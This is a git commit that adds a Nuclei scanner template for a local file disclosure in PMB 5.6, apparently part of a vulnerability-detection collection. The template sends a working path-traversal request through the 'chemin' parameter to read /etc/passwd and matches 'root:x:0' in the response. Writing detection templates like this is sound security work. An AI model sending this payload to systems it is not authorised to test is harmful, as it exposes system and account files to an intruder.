Create pmb-local-file-disclosure.yaml

patch-1
Dhiyaneshwaran 2021-03-12 22:42:45 +05:30 committed by GitHub
parent de4de40f5f
commit ed87cc42a8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 21 additions and 0 deletions

View File

@ -0,0 +1,21 @@
id: pmb-local-file-disclosure
info:
name: PMB 5.6 - 'chemin' Local File Disclosure
author: dhiyaneshDk
severity: high
reference: https://www.exploit-db.com/exploits/49054
requests:
- method: GET
path:
- '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "root:x:0"